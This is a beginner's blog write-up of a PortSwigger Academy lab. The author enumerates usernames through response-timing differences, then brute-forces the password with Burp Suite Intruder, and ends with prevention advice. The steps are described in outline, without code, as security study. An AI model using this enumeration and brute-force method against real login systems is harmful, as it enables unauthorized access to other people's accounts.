Hi everyone, this is my first blog on medium. So I am starting to learn web security from Portwsigger Web Academy and I came across this lab that taught me about basics of Authentication Vulnerabilities, the following is what I learnt :-
π Lab Details
- Platform: PortSwigger Web Security Academy
- Lab: Username Enumeration via Different Responses
- Difficulty: Apprentice
- Category: Authentication Vulnerabilities
π§ Understanding the Vulnerability
Authentication systems sometimes reveal unintended information through their responses.
In some applications, the server behaves differently depending on whether:
- the username exists, or
- the password is incorrect.
These differences may appear as:
- different error messages,
- different response lengths,
- different HTTP status codes,
- or slightly different response times.
Attackers can use these inconsistencies to identify valid usernames before attempting password attacks. This vulnerability is known as Username Enumeration.
π Observation
While testing the login functionality, I noticed a difference in response timing for certain requests.
Using Burp Suite Intruder with a Sniper attack:
- I tested multiple usernames while keeping the password fixed.
- Some responses took slightly longer than others.
This timing difference suggested that:
- the application first checked whether the username existed,
- and then proceeded to validate the password.
If the username was invalid, the request was rejected immediately.
If the username was valid, the server performed an additional password verification step, causing a slightly longer response time.
This behavior leaked information about valid usernames.
βοΈ Exploitation Steps
Step 1 β Open the Target Application
Accessed the PortSwigger lab environment.
Step 2 β Intercept the Login Request
Captured the login request using Burp Suite Proxy.
Step 3 β Send Request to Intruder
Forwarded the request to Burp Suite Intruder for automated testing.
Step 4 β Perform Username Enumeration
Executed a Sniper attack on the username field while keeping the password static.
Step 5 β Analyze Responses
Compared:
- response timing,
- response length,
- and response behavior.
One username produced a noticeably different response time, indicating it was valid.
Step 6 β Enumerate the Password
After identifying the valid username:
- performed another Intruder attack on the password field.
Step 7 β Successful Login
The correct credentials were identified and used to successfully authenticate into the application.
π£ Payloads Used
Username Wordlist
https://portswigger.net/web-security/authentication/auth-lab-usernames
Password Wordlist
https://portswigger.net/web-security/authentication/auth-lab-passwords
π Tools Used
- Burp Suite
- Google Chrome
π‘ Prevention Techniques
Applications should implement the following defenses to prevent username enumeration vulnerabilities:
β Use Generic Error Messages
Avoid messages like:
- "Username does not exist"
- "Incorrect password"
Instead, always use:
"Invalid username or password."
β Maintain Uniform Response Timing
Authentication requests should take approximately the same amount of time regardless of:
- whether the username exists,
- or whether the password is incorrect.
β Avoid Information Leakage
Applications should return:
- identical HTTP status codes,
- identical response structures,
- and consistent error messages.
β Implement Rate Limiting
Restrict repeated login attempts to reduce brute-force attacks.
π― Key Learnings
This lab demonstrated how small inconsistencies in authentication mechanisms can expose sensitive information.
By analyzing server responses with Burp Suite, I learned:
- how attackers enumerate usernames,
- how response timing attacks work,
- and why secure authentication design is important.
Even tiny differences in server behavior can become valuable attack vectors in real-world applications.
β Conclusion
This PortSwigger lab provided a practical demonstration of how authentication flaws can lead to username enumeration.
Using Burp Suite Intruder and response timing analysis, I was able to identify valid credentials and successfully authenticate into the application.
The lab reinforced the importance of:
- consistent authentication responses,
- secure validation workflows,
- and defensive application design.